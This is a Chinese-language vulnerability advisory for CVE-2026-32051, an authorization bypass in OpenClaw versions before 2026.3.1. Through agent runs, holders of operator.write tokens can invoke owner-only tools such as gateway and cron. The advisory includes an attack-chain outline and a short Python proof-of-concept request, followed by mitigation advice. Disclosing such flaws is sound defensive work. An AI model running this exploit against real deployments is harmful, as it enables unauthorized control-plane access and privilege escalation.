CVE-2026-32051 CVSS 8.8 高危

CVE-2026-32051 OpenClaw授权绕过漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32051

漏洞类型

权限绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.1之前的版本中存在严重的授权绕过漏洞。该漏洞源于授权机制的不匹配，允许拥有operator.write权限的经过身份验证的调用者，在基于作用域令牌的部署环境中，通过Agent运行调用本应仅限所有者访问的工具接口，包括网关和定时任务。攻击者利用此漏洞可以超越其预期的授权级别执行控制平面操作，从而获取更高的系统权限，对系统的机密性、完整性和可用性造成严重影响。

技术细节

该漏洞的核心在于OpenClaw在处理Agent运行时的权限校验逻辑存在缺陷。正常情况下，标记为owner-only的工具接口仅允许系统所有者调用。然而，在基于scoped-token的部署模式下，系统未能正确区分上下文中的权限作用域。当攻击者以operator.write权限发起Agent运行请求时，系统在执行过程中跳过了针对特定工具的owner-only门控检查。这使得低权限用户能够滥用Agent执行机制，构造特定的请求参数来触发高权限的API端点。攻击者无需获取所有者凭证，即可通过现有的写权限通道，间接提升权限并执行关键控制平面操作。

攻击链分析

STEP 1

步骤1

攻击者获取一个具有operator.write权限的有效身份验证令牌。

STEP 2

步骤2

攻击者识别目标系统使用scoped-token部署，并定位到受owner-only限制的工具接口（如gateway或cron）。

STEP 3

步骤3

攻击者利用Agent运行机制，构造包含owner-only工具调用参数的恶意请求。

STEP 4

步骤4

系统因授权不匹配漏洞未能正确拦截请求，允许低权限用户执行控制平面操作，完成权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "https://openclaw-instance/api/v1/agent/runs"

# Attacker's token with operator.write scope
headers = {
    "Authorization": "Bearer <operator_write_token>",
    "Content-Type": "application/json"
}

# Payload attempting to access owner-only tool (e.g., gateway) via agent
payload = {
    "tool": "gateway",
    "action": "modify_config",
    "parameters": {
        "malicious_key": "malicious_value"
    }
}

# Exploit the authorization mismatch
response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("Exploit successful! Owner-only action executed.")
else:
    print(f"Exploit failed. Status: {response.status_code}")

影响范围

OpenClaw < 2026.3.1

防御指南

临时缓解措施

在应用补丁之前，建议暂时禁用基于作用域令牌的部署模式，或严格限制具有operator.write权限的用户对Agent运行功能的访问，并密切监控针对网关和Cron接口的异常调用日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表